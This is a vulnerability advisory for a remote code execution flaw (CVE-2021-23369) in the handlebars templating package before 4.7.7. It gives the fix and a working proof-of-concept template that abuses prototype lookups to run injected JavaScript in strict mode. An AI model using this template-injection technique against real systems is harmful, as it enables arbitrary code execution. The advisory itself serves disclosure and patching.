Remote Code Execution (RCE) Affecting handlebars package, versions <4.7.7
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
14.94% (96th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-HANDLEBARS-1056767
- published 15 Feb 2021
- disclosed 8 Jan 2021
- credit Francois Lajeunesse-Robert
Introduced: 8 Jan 2021
CVE-2021-23369 Open this link in a new tabHow to fix?
Upgrade handlebars to version 4.7.7 or higher.
Overview
handlebars is an extension to the Mustache templating language.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
POC
<script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script>
<script>
// compile the template
var s = `
{{#with (__lookupGetter__ "__proto__")}}
{{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}}
{{#with ../constructor.prototype}}
{{../../constructor.defineProperty . "hasOwnProperty" ..}}
{{/with}}
{{/with}}
{{/with}}
{{#with "constructor"}}
{{#with split}}
{{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}}
{{#with .}}
{{#with (concat (lookup join (slice 0 1)))}}
{{#each (slice 2 3)}}
{{#with (apply 0 ../..)}}
{{.}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
`;
var template = Handlebars.compile(s, {
strict: true
});
// execute the compiled template and print the output to the console console.log(template({}));
</script>
References
CVSS Scores
version 3.1